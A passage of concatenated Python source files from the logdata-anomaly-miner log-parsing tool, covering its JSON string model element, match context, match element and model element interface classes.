logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "RETURN MATCHES 3") return matches del matches[-1] continue if len(json_match_data.keys()) > i + 1: match_context.update(match_context.match_data[:match_context.match_data.find( list(json_match_data.keys())[i + 1].encode())]) else: match_context.update(match_context.match_data[:match_context.match_data.find(search_string) + len(search_string)]) return None def parse_json_object(self, json_dict, json_match_data, key, split_key, current_path, match_context): # skipcq: PYL-R0201 """Parse a literal from the json object.""" data = json_match_data[split_key] enc = "utf-8" if isinstance(data, str): if self.is_escaped_unicode(data) and self.dec_escapes: enc = "unicode-escape" data = data.encode(enc) elif isinstance(data, bool): data = str(data).replace("T", "t").replace("F", "f").encode() elif data is None: data = b"null" if self.is_nullable_key(key) or json_dict[key] == "NULL_OBJECT": start = 0 if "null" in key: start = match_context.match_data.find(data) + 4 index = match_context.match_data.find(data, start) if match_context.match_data[index + 4] == 34: index += 1 return MatchElement(current_path, data, data, None), index, data return None, -1, data elif not isinstance(data, bytes): data = str(data).encode() if json_dict[key] == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (DICT)\n" + data.decode()) match_element = MatchElement(current_path, data, data, None) last_bracket = match_context.match_data.find(b"}", len(data)) while match_context.match_data.count(b"{", 0, last_bracket) - match_context.match_data.count(b"}", 0, last_bracket) > 0: last_bracket = match_context.match_data.find(b"}", last_bracket) + 1 index = last_bracket - len(data) elif json_dict[key] == "EMPTY_STRING": if data == b"": match_element = MatchElement(current_path, data, data, None) index = match_context.match_data.find(split_key.encode()) + len(split_key) index += match_context.match_data[index:].find(b'""') + len(b'""') else: match_element = None index = -1 else: match_element = json_dict[key].get_match_element(current_path, MatchContext(data)) if match_element is not None and len(match_element.match_string) != len(data) and ( not isinstance(match_element.match_object, bytes) or len(match_element.match_object) != len(data)): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Data length not matching! match_string: {len(match_element.match_string)}, data: {len(data)}," f" data: {data.decode()}") match_element = None index = max([match_context.match_data.replace(b"\\", b"").find(split_key.encode()), match_context.match_data.find(split_key.encode()), match_context.match_data.decode().find(split_key)]) index += match_context.match_data[index:].find(split_key.encode() + b'":') + len(split_key.encode() + b'":') try: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode(enc)[index:].find(data.decode(enc))]) except UnicodeDecodeError: index += max([match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data), match_context.match_data.decode()[index:].find(data.decode())]) index += len(match_context.match_data[index:]) - len(match_context.match_data[index:].lstrip(b" \r\t\n")) if match_context.match_data[index:].find(b'"') == 0: index += len(b'"') # for example float scientific representation is converted to normal float.. if index == -1 and match_element is not None and isinstance(json_match_data[split_key], float): indices = [match_context.match_data.find(b",", len(match_element.match_string) // 3), match_context.match_data.find(b"]"), match_context.match_data.find(b"}")] indices = [x for x in indices if x >= 0] index = min(indices) if match_element is None: index = -1 return match_element, index, data JsonStringModelElement.py000066400000000000000000000224541437606560100355470ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element for parsing json strings This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import orjson from collections import deque from typing import Any from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class JsonAccessObject: """ The JsonAccessObject transforms a dictionary. It takes a dictionary "d" and flattens the dictionary to: key.another_key.somelist[0].foo = bar During the flatten()-process, it will create a self.collection dictionary with the format: collection[flattened-key]{levels[],value} """ def __init__(self, d: dict): self.debug: bool = False self.levels: deque = deque() self.delimiter: str = '.' self.collection: dict = {} self.flatten(d) def join_levels(self): """joins levels using a specific delimiter""" ret = "" for i in self.levels: if not i.startswith("[") and len(ret) != 0: ret += self.delimiter ret += i return ret def create_collection_entry(self, index: str, levels: deque, value): """adds entry to the collection""" subentry = {} subentry['levels'] = levels.copy() subentry['value'] = value self.collection[index] = subentry def flatten(self, d: Any, islist=-1): """recursive function for flattening a dictionary""" if islist > -1: for k in d: if isinstance(k, dict): # skipcq: FLK-E228 self.levels.append(f"[{islist}]") islist = islist+1 self.flatten(k) self.levels.pop() elif isinstance(k, list): self.flatten(k, list) else: if self.debug: print(f"{ self.join_levels() }[{ islist }]: { k }") # skipcq: PYL-C0209 self.create_collection_entry("%s[%d]" % (self.join_levels(), islist), self.levels, k) islist = islist + 1 else: for (k, v) in d.items(): if isinstance(v, dict): self.levels.append(k) self.flatten(v) if len(self.levels) != 0: self.levels.pop() elif isinstance(v, list): self.levels.append(k) self.flatten(v, 0) if len(self.levels) != 0: self.levels.pop() else: if len(self.levels) == 0: if self.debug: print(f"{ k } : { v }") self.create_collection_entry(k, deque([k]), v) else: if islist > -1: # skipcq: FLK-E228 self.levels.append(f"{k}[{ islist}]") islist = islist+1 else: self.levels.append(k) if self.debug: print(f"{ self.join_levels() } : { v }") self.create_collection_entry(self.join_levels(), self.levels, v) self.levels.pop() class JsonStringModelElement(ModelElementInterface): """This class parses json-strings and matches the keys with a given key_parser_dict.""" def __init__(self, element_id: str, key_parser_dict: dict, strict_mode: bool = False, ignore_null: bool = True): self.children: list = [] self.strict_mode = strict_mode self.ignore_null = ignore_null if not isinstance(key_parser_dict, dict): msg = "key_parser_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.jao = JsonAccessObject(key_parser_dict) if not isinstance(element_id, str): msg = "element_id has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(element_id) < 1: msg = "element_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.element_id = element_id self.fill_children() super().__init__(element_id, key_parser_dict=key_parser_dict, strict_mode=strict_mode, ignore_null=ignore_null) def fill_children(self): """creates list of children from config-json""" for entry in self.jao.collection.values(): self.children.append(entry['value']) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): # skipcq: PYL-R0201 """ Get all possible child model elements of this element. @return None as there are no children of this element. """ return self.children def get_match_element(self, path: str, match_context): """Just return a match including all data from the context.""" current_path = f"{ path }/ { self.element_id }" logging.getLogger(DEBUG_LOG_NAME).info("JsonStringModelElement %s/%s", path, match_context.match_data.decode('utf-8')) matches = [] try: jdict = orjson.loads(match_context.match_data) if self.strict_mode: jdictjao = JsonAccessObject(jdict) if len(jdictjao.collection) != len(self.jao.collection): msg = "JsonStringModelElement-subparser-error: " msg += "strict mode enabled and fields detected that do not exist in parser-config" logging.getLogger(DEBUG_LOG_NAME).debug(msg) return None try: for (k, v) in self.jao.collection.items(): # empty string if value is null parse_line = b"" if jdictjao.collection[k]['value'] is not None: parse_line = str(jdictjao.collection[k]['value']).encode('utf-8') else: if self.ignore_null: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", k) continue child_match = v['value'].get_match_element(current_path, MatchContext(parse_line)) if child_match is None: msg = "JsonStringModelElement-subparser-error: %s -> %s" logging.getLogger(DEBUG_LOG_NAME).debug(msg, k, str(jdictjao.collection[k]['value'])) return None matches += [child_match] except KeyError: msg = "JsonStringModelElement-subparser-error: field \"%s\" not found but strict-enabled" logging.getLogger(DEBUG_LOG_NAME).debug(msg, k) return None else: for (k, v) in self.jao.collection.items(): tmp = jdict.copy() try: for level in v['levels']: tmp = tmp[level] except KeyError: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser: %s not found", k) parse_line = b"" # empty string if value is null if tmp is not None: parse_line = str(tmp).encode('utf-8') else: if self.ignore_null: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", k) continue child_match = v['value'].get_match_element(current_path, MatchContext(parse_line)) if child_match is None: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser-error: %s -> %s", k, tmp) return None matches += [child_match] except orjson.JSONDecodeError as exception: msg = f"JsonStringModelElement { exception }: { match_context.match_data.decode('utf-8') }" logging.getLogger(DEBUG_LOG_NAME).error(msg) return None match_data = match_context.match_data if not match_data: return None match_context.update(match_data) return MatchElement(current_path, match_data, match_data, matches) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchContext.py000066400000000000000000000112621437606560100336270ustar00rootroot00000000000000""" This module defines the match context. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from typing import Union from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig class MatchContext: """ This class allows storage of data relevant during the matching process, e.g. the root node and the remaining unmatched data. Then searching for non-atomic matches, e.g. sequences, the context might be modified by model subelements, even if the main model element will not return a match. In that case, those non-atomic model elements have to care to restore the context before returning. """ def __init__(self, match_data: bytes): """ Create a MatchContext with the full unmatched string data. @param match_data the data that will be tested by the next model element. """ if not isinstance(match_data, bytes): msg = "match_data has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_data = match_data def update(self, match_string: bytes): """ Update the match context by removing the given matched string data from the context data still to be matched. This method does not check, if the removed data is the same as the trailing match data for performance reasons. This is done only in the DebugMatchContext class. """ self.match_data = self.match_data[len(match_string):] class DebugMatchContext(MatchContext): """This class defines a slower MatchContext for debugging purposes.""" def __init__(self, match_data: bytes): self.debug_info = "" self.last_match_data: Union[None, bytes] = None self.shortest_unmatched_data = match_data super(DebugMatchContext, self).__init__(match_data) def update(self, match_string: bytes): """Update the context and store debugging information.""" if not isinstance(match_string, bytes): msg = "match_string has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(match_string) < 1: return try: match_data = self.match_data.decode(AminerConfig.ENCODING) m_string = match_string.decode(AminerConfig.ENCODING) except UnicodeError: match_data = repr(self.match_data) m_string = repr(match_string) if self.last_match_data != self.match_data: self.last_match_data = self.match_data if self.debug_info != "": self.debug_info += " " self.debug_info += f'Starting match update on "{match_data}"\n' if not self.match_data.startswith(match_string): self.debug_info += f' Current data {match_data} does not start with "{m_string}"\n' msg = "Illegal state" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.match_data = self.match_data[len(match_string):] self.last_match_data = self.match_data if (self.shortest_unmatched_data is None) or (len(self.match_data) < len(self.shortest_unmatched_data)): self.shortest_unmatched_data = self.match_data self.debug_info += f' Removed: "{m_string}", remaining {len(self.match_data)} bytes\n' def get_debug_info(self): """Get the current debugging information and reset it.""" while self.debug_info.find("\n\n") != -1: self.debug_info = self.debug_info.replace("\n\n", "\n") result = self.debug_info self.debug_info = "" try: data = self.shortest_unmatched_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.shortest_unmatched_data) result += f' Shortest unmatched data: "{data}"\n' return result def get_shortest_unmatched_data(self): """ Get the shortest match_data found while updating the internal state. This is useful to find out where the parsing process has terminated. """ return self.shortest_unmatched_data logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchElement.py000066400000000000000000000144001437606560100335710ustar00rootroot00000000000000""" This module provides only the MatchElement class to store results from parser element matching process. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from typing import Any, List, Union from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig class MatchElement: """This class allows storage and handling of data related to a match found by a model element.""" def __init__(self, path: Union[str, None], match_string: bytes, match_object: Any, children: Union[List["MatchElement"], None]): """ Initialize the MatchElement. @param path when None, this element is anonymous. Hence, it cannot be added to the result data and cannot have children. @param match_string the part of the input bytes string covered by the given match. @param match_object the matchString converted to an object for matchers detecting more complex data types, e.g., integer numbers or IP addresses. @param children list of MatchElements which matched in the process. """ if not isinstance(path, str) and path is not None: msg = "path has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if (not path) and children: msg = "Anonymous match may not have children" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.path = path if not isinstance(match_string, bytes): msg = "match_string has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_string = match_string self.match_object = match_object if not isinstance(children, list) and children is not None: msg = "children has to be of the type list or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(children, list): if len(children) < 1: msg = "children must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for child in children: if not isinstance(child, MatchElement): msg = "children have to be of the type MatchElement." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.children = children def get_path(self): """Get the path of this element.""" return self.path def get_match_string(self): """Get the log_atom string part this match element is matching.""" return self.match_string def get_match_object(self): """Get the matched data converted to an object of suitable type.""" return self.match_object def get_children(self): """Get the submatch children of this match, if any.""" return self.children def annotate_match(self, indent_str: Union[str, None]): """ Annotate a given match element showing the match path elements and the parsed values. @param indent_str if None, all elements are separated just with a single space, no matter how deep the nesting level of those elements is. If not None, all elements are put into an own line, that is prefixed by the given indent_str and indenting is increased by two spaces for each level. """ next_indent = None if not isinstance(indent_str, str) and indent_str is not None: msg = "indent_str has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) try: if isinstance(self.match_object, bytes): data = self.match_object.decode(AminerConfig.ENCODING) else: data = repr(self.match_object) except UnicodeError: data = repr(self.match_object) if indent_str is None: result = f"{self.path}: {data}" else: result = f"{indent_str}{self.path}: {data}" next_indent = indent_str + " " if self.children is not None: for child_match in self.children: if next_indent is None: result += " " + child_match.annotate_match(None) else: result += "\n" + child_match.annotate_match(next_indent) return result def serialize_object(self): """ Create a serialization of this match element and all the children. With sane and unique path elements, the serialized object will also be unique. """ children = [] if self.children: for child_match in self.children: children.append(child_match.serialize_object()) return {"path": self.path, "match_object": self.match_object, "match_string": self.match_string, "children": children} def __str__(self): """Get a string representation of this match element excluding the children.""" num_children = 0 if self.children is not None: num_children = len(self.children) try: match_string = self.match_string.decode(AminerConfig.ENCODING) if isinstance(self.match_object, bytes): match_object = self.match_object.decode(AminerConfig.ENCODING) else: match_object = repr(self.match_object) except UnicodeError: match_string = repr(self.match_string) match_object = repr(self.match_object) return f"MatchElement: path = {self.path}, string = {match_string}, object = {match_object}, children = {num_children}" ModelElementInterface.py000066400000000000000000000574601437606560100353540ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines various interfaces for log atom parsing and namespace shortcuts to the ModelElements. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc import locale import logging import re from aminer.AminerConfig import DEBUG_LOG_NAME SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" EXP_TYPE_NONE = "none" EXP_TYPE_OPTIONAL = "optional" EXP_TYPE_MANDATORY = "mandatory" class ModelElementInterface(metaclass=abc.ABCMeta): """This is the superinterface of all model elements.""" def __init__(self, element_id, **kwargs): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for available formats. Supported format specifiers are: * %b: month name in current locale * %d: day in month, can be space or zero padded when followed by separator or at end of string. * %f: fraction of seconds (the digits after the the ".") * %H: hours from 00 to 23 * %M: minutes * %m: two digit month number * %S: seconds * %s: seconds since the epoch (1970-01-01) * %Y: 4 digit year number * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically. Common formats are: * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43" * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00" * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456" * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC" * "%d.%m.%Y" e.g. for "07.02.2019" * "%H:%M:%S" e.g. for "11:40:23" @param time_zone the timezone for parsing the values or UTC when None. @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a tuple of (locale, encoding) or a string. @param start_year when parsing date records without any year information, assume this is the year of the first value parsed. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed, EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values. @param delimiter a non-escaped delimiter string to search for. @param escape a character to escape in the string. @param consume_delimiter True if the delimiter character should also be consumed. @param value_model the ModelElement which has to match the data. @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a value, this model element will not match. A path value of None indicates, that the match element of the value_model should be used directly. @param branch_model_dict a dictionary to select a branch for the value identified by valuePath. @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None. @param children a list of child elements to be iterated through. @param fixed_data a non-escaped delimiter string to search for. @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in the class documentation, an Exception will be raised. @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. @param optional_element the element to be optionally matched. @param repeated_element the MatchElement to be repeated in the data. @param min_repeat the minimum number of repeated matches of the repeated_element. @param max_repeat the maximum number of repeated matches of the repeated_element. @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. @param alphabet the allowed letters to match data. @param strict_mode If strict is set to true all keys must be defined. The parser will fail if the logdata has a json-key that is not defined in the key_parser_dict @param ignore_null ignore json-keys with values "null" """ allowed_kwargs = [ "date_format", "time_zone", "text_locale", "start_year", "max_time_jump_seconds", "value_sign_type", "value_pad_type", "exponent_type", "delimiter", "escape", "consume_delimiter", "value_model", "value_path", "branch_model_dict", "default_branch", "children", "fixed_data", "wordlist", "ipv6", "key_parser_dict", "optional_key_prefix", "nullable_key_prefix", "allow_all_fields", "optional_element", "repeated_element", "min_repeat", "max_repeat", "upper_case", "alphabet", "strict_mode", "ignore_null", "timestamp_scale" ] for argument, value in list(locals().items())[1:-1]: # skip self parameter and kwargs if value is not None: setattr(self, argument, value) for argument, value in kwargs.items(): # skip self parameter and kwargs if argument not in allowed_kwargs: msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) setattr(self, argument, value) if not isinstance(element_id, str): msg = "element_id has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(element_id) < 1: msg = "element_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "date_format"): if not isinstance(self.date_format, bytes): msg = "date_format has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.date_format) <= 1: msg = "At least one date_format specifier must be defined." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "text_locale") and self.text_locale is not None: if not isinstance(self.text_locale, str) and not isinstance(self.text_locale, tuple): msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(self.text_locale, tuple) and len(self.text_locale) != 2: msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) try: old_locale = locale.getdefaultlocale() if old_locale != self.text_locale: locale.setlocale(locale.LC_ALL, self.text_locale) msg = f"Changed time locale from {self.text_locale} to {''.join(self.text_locale)}." logging.getLogger(DEBUG_LOG_NAME).info(msg) except locale.Error: msg = f"text_locale {self.text_locale} is not installed!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise locale.Error(msg) if hasattr(self, "start_year") and self.start_year is not None and (not isinstance(self.start_year, int) or isinstance( self.start_year, bool)): msg = "start_year has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "max_time_jump_seconds"): if not isinstance(self.max_time_jump_seconds, int) or isinstance(self.max_time_jump_seconds, bool): msg = "max_time_jump_seconds has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_time_jump_seconds <= 0: msg = "max_time_jump_seconds must not be lower than 1 second." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "value_sign_type"): if not isinstance(self.value_sign_type, str): msg = f"value_sign_type must be of type string. Current type: {type(self.value_sign_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.value_sign_type == SIGN_TYPE_NONE: self.start_characters = set(b"0123456789") elif self.value_sign_type == SIGN_TYPE_OPTIONAL: self.start_characters = set(b"-0123456789") elif self.value_sign_type == SIGN_TYPE_MANDATORY: self.start_characters = set(b"+-") else: msg = f"Invalid value_sign_type {self.value_sign_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "value_pad_type"): self.pad_characters = b"" if not isinstance(self.value_pad_type, str): msg = f"value_pad_type must be of type string. Current type: {type(self.value_pad_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.value_pad_type == PAD_TYPE_NONE: pass elif self.value_pad_type == PAD_TYPE_ZERO: self.pad_characters = b"0" elif self.value_pad_type == PAD_TYPE_BLANK: self.pad_characters = b" " else: msg = f"Invalid value_pad_type {self.value_pad_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "exponent_type"): if not isinstance(self.exponent_type, str): msg = f"exponent_type must be of type string. Current type: {type(self.exponent_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.exponent_type not in [EXP_TYPE_NONE, EXP_TYPE_OPTIONAL, EXP_TYPE_MANDATORY]: msg = f"Invalid exponent_type {self.exponent_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "delimiter"): if not isinstance(self.delimiter, bytes): msg = "delimiter has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.delimiter) < 1: msg = "delimiter must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "escape") and self.escape is not None: if not isinstance(self.escape, bytes): msg = "escape has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.escape) < 1: msg = "escape must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "consume_delimiter") and not isinstance(self.consume_delimiter, bool): msg = "consume_delimiter has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "value_model") and not isinstance(self.value_model, ModelElementInterface): msg = "value_model has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "value_path") and self.value_path is not None: if not isinstance(self.value_path, str): msg = "value_path has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.value_path) < 1: msg = "value_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "branch_model_dict"): if not isinstance(self.branch_model_dict, dict): msg = "branch_model_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for val in self.branch_model_dict.values(): if not isinstance(val, ModelElementInterface): msg = "all branch_model_dict values have to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "default_branch") and self.default_branch is not None and not isinstance( self.default_branch, ModelElementInterface): msg = "default_branch has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "children"): if not isinstance(self.children, list): msg = "children has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.children) < 1: msg = "children must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for child in self.children: if not isinstance(child, ModelElementInterface): msg = "all children have to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "fixed_data"): if not isinstance(self.fixed_data, bytes): msg = "fixed_data has to be of the type byte string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.fixed_data) < 1: msg = "fixed_data must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "wordlist"): if not isinstance(self.wordlist, list): msg = "wordlist has to be of the type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.wordlist) < 1: msg = "wordlist must have at least one element." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for word in self.wordlist: if not isinstance(word, bytes): msg = "words from the wordlist must be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for test_pos, ref_word in enumerate(self.wordlist): for test_word in self.wordlist[test_pos + 1:]: if test_word.startswith(ref_word): msg = f"Word {repr(test_word)} would be shadowed by word {repr(ref_word)} at lower position" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "upper_case"): if not isinstance(self.upper_case, bool): msg = "upper_case has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.upper_case: self.hex_regex = re.compile(rb"[0-9A-F]+") else: self.hex_regex = re.compile(rb"[0-9a-f]+") if hasattr(self, "ipv6") and not isinstance(self.ipv6, bool): msg = "ipv6 has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "key_parser_dict") and not isinstance(self.key_parser_dict, dict): msg = "key_parser_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "optional_key_prefix"): if not isinstance(self.optional_key_prefix, str): msg = "optional_key_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.optional_key_prefix) < 1: msg = "optional_key_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "nullable_key_prefix"): if not isinstance(self.nullable_key_prefix, str): msg = "nullable_key_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.nullable_key_prefix) < 1: msg = "nullable_key_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "optional_key_prefix") and hasattr(self, "nullable_key_prefix") and\ self.optional_key_prefix == self.nullable_key_prefix: msg = "optional_key_prefix must not be the same as nullable_key_prefix!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "allow_all_fields") and not isinstance(self.allow_all_fields, bool): msg = "allow_all_fields has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "optional_element") and not isinstance(self.optional_element, ModelElementInterface): msg = 